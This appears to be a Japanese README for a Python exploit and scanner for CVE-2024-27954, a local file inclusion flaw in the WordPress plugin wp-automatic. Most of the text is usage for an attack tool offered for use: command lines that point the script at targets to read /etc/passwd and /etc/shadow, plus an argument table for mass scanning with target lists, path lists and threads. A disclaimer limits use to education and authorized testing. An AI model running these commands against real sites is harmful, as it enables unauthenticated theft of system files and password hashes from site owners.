
このプロジェクトは、WordPress プラグイン wp-automatic で見つかった重大な脆弱性 CVE-2024-27954 を対象とした、Python ベースのローカルファイルインクルージョン (LFI) 脆弱性スキャナーを提供します。この脆弱性により、認証されていない攻撃者が file:// インジェクションベクターを使用してサーバー上の任意のファイルを読み取ることができます。
wp-automatic プラグイン/etc/passwd、設定ファイル、ソースコード)file:// スキームを使用した信頼できない link パラメーターrequests モジュール依存関係をインストール:
pip install requests
python3 CVE-2024-27954.py --url http://TARGET --lfi-path /etc/passwd
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/passwd --proxy "http://127.0.0.1:8080" --output results.txt
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/shadow --proxy "http://127.0.0.1:8080" --output results.txt
このツールは、教育目的および許可を得たペネトレーションテスト専用に作られています。システムへの無許可アクセスは違法となる場合があります。責任を持って使用してください。
| 引数 | 説明 |
|---|
--url | 単一のターゲット URL (例: http://TARGET:8080) |
--list | ターゲット URL のリストを含むファイル (1行に1つ) |
--lfi-path | テストする単一のファイルパス (デフォルト: /etc/passwd) |
--paths-file | 複数のファイルパスを含むファイル (1行に1つ) |
--proxy | プロキシ (例: http://127.0.0.1:8080) |
--output | 脆弱な結果を保存するファイル |
--threads | 同時スレッド数 (デフォルト: 3) |